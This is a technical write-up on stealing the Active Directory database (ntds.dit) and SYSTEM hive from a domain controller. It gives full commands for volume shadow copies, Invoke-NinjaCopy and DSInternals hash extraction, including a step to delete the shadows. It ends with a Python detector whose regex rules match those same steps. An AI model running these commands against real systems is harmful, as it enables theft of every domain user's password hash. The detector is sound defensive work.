The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller.
With access to a domain controller's file system, an adversary can exfiltrate ntds.dit together with the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit. While Active Directory is running it holds a file system lock on the ntds.dit file, so a plain attempt to copy it will fail.
Either local access or remote access to the domain controller will do.
Method 1) an adversary may simply stop Active Directory, though this is likely to get them detected; Method 2) use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot:
(Administrator privileges required)
C:\Users\Administrator>vssadmin list shadows
C:\Users\Administrator>vssadmin create shadow /for=C:
C:\Users\Administrator>vssadmin list shadows
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\extract\ntds.dit
C:\Users\Administrator>reg save hklm\system c:\extract\SYSTEM_reg
C:\Users\Administrator>vssadmin delete shadows /Shadow={22af24c0-bcd4-46b1-aff7-dce2dc4f25f6} /quiet
C:\Users\Administrator>vssadmin delete shadows /for=c: /quiet
C:\Users\Administrator>vssadmin list shadows
Method 3) use built-in tools like NTDSUtil.exe or DSDBUtil.exe; Method 4) use PowerShell tools like PowerSploit's Invoke-NinjaCopy.
One module is Invoke-NinjaCopy, which copies a file from an NTFS-partitioned volume by reading the raw volume. This approach is another way to access files that are locked by Active Directory without alerting any monitoring systems.
PS C:\Users\Administrator\Desktop> Invoke-NinjaCopy -Path c:\windows\system32\config\system -LocalDestination C:\extract2\system -Verbose
PS C:\Users\Administrator\Desktop> Invoke-NinjaCopy -Path c:\windows\ntds\ntds.dit -LocalDestination C:\extract2\ntds.dit -Verbose
Install-Module DSInternals
Import-Module DSInternals
$bootkey = Get-BootKey -SystemHiveFilePath .\extract\SYSTEM_reg
Get-ADDBAccount -BootKey $bootkey -DatabasePath '.\extract\ntds.dit' -All | Out-File .\extract\result.txt
If running Get-ADDBAccount produces the following error:
run the following command:
esentutl /p c:\extract\ntds.dit /!10240 /8 /o
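From a defender's side, every step above leaves a process command line on the domain controller (vssadmin creating a shadow, a copy out of a HarddiskVolumeShadowCopy path, reg save of the SYSTEM hive, ntdsutil/dsdbutil, esentutl run against ntds.dit, Invoke-NinjaCopy). The following is an added example, not code from the page: a small Python detector that runs those patterns over constructed process-creation records and raises an alert when one host/user pair trips more than one of them. The record field names (host, user, cmd), the sample events and the threshold are assumptions for illustration.

```python
import re

# Constructed sample of process-creation events (command lines only); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\admin", "cmd": r"vssadmin create shadow /for=C:"},
    {"host": "DC01", "user": "CORP\\admin",
     "cmd": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\extract\ntds.dit"},
    {"host": "DC01", "user": "CORP\\admin", "cmd": r"reg save hklm\system c:\extract\SYSTEM_reg"},
    {"host": "WS07", "user": "CORP\\alice", "cmd": r"notepad.exe C:\Users\alice\notes.txt"},
    {"host": "DC01", "user": "CORP\\admin", "cmd": r"dsdbutil.exe"},
    {"host": "DC01", "user": "CORP\\admin", "cmd": r"esentutl /p c:\extract\ntds.dit /!10240 /8 /o"},
    {"host": "DC01", "user": "CORP\\admin",
     "cmd": r"powershell -c Invoke-NinjaCopy -Path c:\windows\ntds\ntds.dit -LocalDestination C:\extract\ntds.dit"},
]

# Detection rules: (name, regex over the command line). Each mirrors one step described on the page.
RULES = [
    ("vss_shadow_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds_copy_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I)),
    ("system_hive_export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
    ("ntdsutil_or_dsdbutil", re.compile(r"\b(ntdsutil|dsdbutil)(\.exe)?\b", re.I)),
    ("esentutl_on_ntds", re.compile(r"\besentutl(\.exe)?\b.*ntds\.dit", re.I)),
    ("ninjacopy", re.compile(r"Invoke-NinjaCopy", re.I)),
]


def match_rules(cmd):
    """Names of all rules whose pattern appears in one command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def detect(events, threshold=2):
    """Group rule hits per (host, user); flag an alert once distinct rules reach the threshold.

    A single hit (e.g. one vssadmin call by backup software) is kept as context but does not
    alert on its own; the combination of shadow creation plus ntds.dit/SYSTEM access does.
    """
    hits = {}
    for ev in events:
        for name in match_rules(ev["cmd"]):
            hits.setdefault((ev["host"], ev["user"]), set()).add(name)
    return {key: {"rules": sorted(names), "alert": len(names) >= threshold}
            for key, names in hits.items()}


if __name__ == "__main__":
    for key, info in detect(SAMPLE_EVENTS).items():
        print(key, "ALERT" if info["alert"] else "info", info["rules"])
```

Wire the same rules to Sysmon event 1 or Security event 4688 command lines (with command-line auditing enabled) and scope them to domain controllers to keep the false-positive rate down.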